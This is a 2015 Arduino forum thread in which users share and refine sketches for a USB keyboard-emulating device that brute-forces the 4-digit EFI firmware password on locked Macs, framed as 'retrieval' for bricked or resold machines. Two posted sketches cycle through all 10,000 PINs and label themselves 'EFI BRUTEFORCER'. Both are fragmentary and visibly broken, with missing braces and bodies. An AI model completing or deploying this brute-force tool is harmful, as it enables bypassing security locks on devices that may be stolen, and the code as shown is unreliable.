
Topic: Revisiting orvtech's EFI Firmware & iCloud unlock for Macs


May 24, 2015, 07:33 am Last Edit: May 24, 2015, 08:37 am by Somerset Reason: added code select
This sketch has been kicked around and modified for years. I would first like to thank orvtech, knoy, Ivan Mendoza, Anaruz, evasoft, yixiy, amora, and all of the others that developed and helped improve this sketch along the way (sorry to those I didn't mention). The original version was written for use with Teensy 3.0 and then later scripted for Arduino Leonardo. The best part of these sketches is they turn bricks back into the useful machines they were intended to be. The worst part of these sketches is the lack of convenience, including having to watch the display, the clock, and ultimately work out the attempts over time to actually retrieve what the sketch was written for. Finally, the sketch has been utilized to make companies (and individuals) hundreds of dollars. Devices and "services" are sold on eBay for $60-$100. NerdsArmy even has several versions - the top of the line costing around $450.
My intention is to have great minds working on this again to include the best features at the lowest cost. Instead of the Teensy 3.1 version that leaves you to set up a video recorder, run calculations, and possibly run additional, modified attempts to get to the goal - I think the ultimate device would include the necessary keyboard strokes, mouse movements and clicks, LCD display of counter, and the ability to stop when finished - possibly utilizing a microphone to listen for a reboot chime (if applicable), or a light sensor that can detect the screen change, or by being aware of a USB hardware check.
I don't know the entire Arduino catalog but I'm envisioning the Leonardo with LCD shield for this task. I'm not really concerned with the increase in size and cost but more efficiency and functionality.
I am new to this whole environment and have no knowledge of writing code. I haven't produced or utilized any devices (though I plan to). I've spent more time with hardware and repair which has led me on this search. I've read many blogs and found there is a lot of great information scattered all around but no convenient one-stop-shop for those who are interested in producing their own, quality, working device with a step-by-step tutorial. Perhaps the community mindset is "if you can't labor through hours, days, and years of blogs and put your own blood and sweat in - then you simply don't deserve it".
Anyway....The "base" sketches can be retrieved from GitHub.
Here is something I've compiled but it hasn't been tested and more than likely does not work - just a concept or a theory. (Note: it doesn't yet include anything to stop the count when goal is met). Please forgive my ignorance.

Code: [Select]

#include <usb_keyboard.h>
#include <LiquidCrystal.h>
LiquidCrystal lcd(12, 11, 5, 4, 3, 2);

const int ledPin = 13; // choose the pin for the LED
int counter = 0;
//waits for iCloud
int loops = 0;
int fakecounter = counter;
char pin[]="xxxx";

void setup() {

lcd.begin(16, 2);
lcd.print("CODE INPUT");
pinMode(ledPin, OUTPUT); // declare LED as output

void loop(){
//lets wait 1 minute and 1 second
  if (loops == 5){
//lets wait 5 minutes and one second
  else if (loops == 6){
//lets wait 15 minutes and 1 second
  else if (loops == 7){
  loops = 0;
//lets get to work
if (counter <= 9999){
  delay(1500); // vs (8000)
  digitalWrite(ledPin, LOW);
  delay(800); // vs (5500)
  digitalWrite(ledPin, HIGH);
  sprintf(pin, "%04d", fakecounter);
  //sending first digit
  //sending second digit
  //sending third digit
  //sending fourth digit
  //sending return

  lcd.setCursor(0, 1);
  lcd.setCursor(1, 1);
  lcd.setCursor(2, 1);
  lcd.setCursor(3, 1);


//reached 4 digit PIN max value
if (counter > 9999){
  for (int blinkies = 0; blinkies < 8; blinkies++) {
    digitalWrite(ledPin, HIGH);
    digitalWrite(ledPin, LOW);
fakecounter = counter;

Please keep replies and comments relevant and useful.
Thank you.


May 24, 2015, 07:38 am Last Edit: May 24, 2015, 07:38 am by JimboZA
First relevant and useful reply: please edit the post and put the code inside
[code]code here[/code] tags so that

Code: [Select]
it looks
like this

While you're at it, you might like to give the thread a title that actually gives some info.
Johannesburg hams call me: ZS6JMB on Highveld rep 145.7875 (-600 & 88.5 tone)
Dr Perry Cox: "Help me to help you, help me to help you...."
Your answer may already be here: https://forum.arduino.cc/index.php?topic=384198.0


OK, I give up, what is the purpose of the program?
Please do not send me PMs asking for help.  Post in the forum then everyone will benefit from seeing the questions and answers.



Even with the change of title, I am still none the wiser.

You have shown us a sketch, that you say is untested.

We don't know what it is supposed to do.

Even if we were to test it for you, how would we know whether it was a pass/fail?


The "device" is supposed to enter (as a USB HID) the 10,000 possibilities of a 4-digit numeric code with delays built in to copy human typing. It also applies mouse movements and/or clicks to keep the computer from going to sleep. (Some variations call for a restart of the computer at certain intervals). In the early stages the sketch only allowed for the keystrokes and the user would have to watch along or set up a video camera, along with a timer, to capture when the code was finally entered correctly. The user would then have to figure how many attempts were made over the period of time and do the math to get close to the code to manually type entries until the exact match was found. Sometimes this also meant running the device again with a narrowed range. Later the sketch allowed for an LCD to display the number that was being entered. This made it easier, since the user didn't have to do the calculations, but the user still had to record the process - as it takes roughly 2 days to enter all 10,000 possibilities. Though the numbers were being displayed, however, the process would keep running even after the correct code was entered. Thus the need for coming up with a way to stop the device - via microphone, light sensor, etc.
Keep in mind this was originally written (and seemed to work best) with the Teensy 3.0 or 3.1. Some have used Arduino Leonardo and that is what I am hoping to build on.

Please allow me to post some links that may help with the explanation:







Thank you for your time and interest.


So this is an attempt to write a program to hack an iCloud account.
Please do not send me PMs asking for help.  Post in the forum then everyone will benefit from seeing the questions and answers.


Let's call it a retrieval device. I do not condone the theft of property or information. In my experience repairing machines, there are many items that are sold online (eBay) that are locked. Just because an item is locked doesn't mean it was stolen. Some of these items could be lost or the rightful owner has passed away or simply forgot the firmware password and could not provide all of the necessary information to Apple to unlock them. Apple has become very strict in this regard. What do they care about bricked devices - that just means they're more able to sell new products.
Again, I do not condone any illegal activity or misuse of this device.


I have thrown together this sketch for the brute forcing of the 4 digit EFI code. I'm using the Pro Micro board and have added the use of an LCD to display the current pin attempt. I have tested on a Windows machine in the notepad and all seems fine. I haven't connected an LCD yet as I'm waiting for delivery, and I have not yet tested on an EFI locked Mac. This code is for the padlocked screen, not for the iCloud screen. This is my first attempt at coding, so please bear this in mind. Any help will be appreciated, and if someone could test this with an LCD and on a Mac that would be a great help. I will upload the code in my next post.


// This code is licensed under Apache 2.0 License
// http://www.apache.org/licenses/LICENSE-2.0.txt
// Limitation of Liability. In no event and under no legal theory,
// whether in tort (including negligence), contract, or otherwise,
// unless required by applicable law (such as deliberate and grossly
// negligent acts) or agreed to in writing, shall any Contributor be
// liable to You for damages, including any direct, indirect, special,
// incidental, or consequential damages of any character arising as a
// result of this License or out of the use or inability to use the
// Work (including but not limited to damages for loss of goodwill,
// work stoppage, computer failure or malfunction, or any and all
// other commercial damages or losses), even if such Contributor
// has been advised of the possibility of such damages.
// This code is intended for people who are not able to contact
// apple support and I am in no way liable for any damage or
// problems this code might cause.

Code: [Select]

#include <LiquidCrystal.h>

int finishedPINcracking = 0;//

const int ledPin = 13; 

const int digit1_start = 0; 

const int digit2_start = 0; 

const int digit3_start = 0; 

const int digit4_start = 0;

const int digit1_stop = 9; 

const int digit2_stop = 9; 

const int digit3_stop = 9; 

const int digit4_stop = 9; 

LiquidCrystal lcd(12, 11, 5, 4, 3, 2);

void setup() {

lcd.begin(16, 2);

lcd.print("EFI BRUTEFORCER");
lcd.print("ATTACKING EFI");
lcd.print("CODE ATTEMPT");

pinMode(ledPin, OUTPUT);

delay(6000); } 

void loop() { 

if ( finishedPINcracking == 0 ) { 

for( int digit1 = digit1_start; digit1 <= digit1_stop; digit1++ ) {


for( int digit2 = digit2_start; digit2 <= digit2_stop; digit2++ ) {


for( int digit3 = digit3_start; digit3 <= digit3_stop; digit3++ ) {


for( int digit4 = digit4_start; digit4 <= digit4_stop; digit4++ ) { 

if ( (digit4 == 4) || (digit4 == 9) )

{  Keyboard.println(String(digit1) + String(digit2) + String(digit3) + String(digit4)); 

for ( int timer = 1; timer <= 6; timer++ ) { digitalWrite(ledPin, HIGH);  }


digitalWrite(ledPin, LOW); } 

else{ Keyboard.print(String(digit1)); 






lcd.setCursor(0, 1);


lcd.setCursor(1, 1);


lcd.setCursor(2, 1);


lcd.setCursor(3, 1);




Keyboard.println(); } } } } } finishedPINcracking = 1; }}
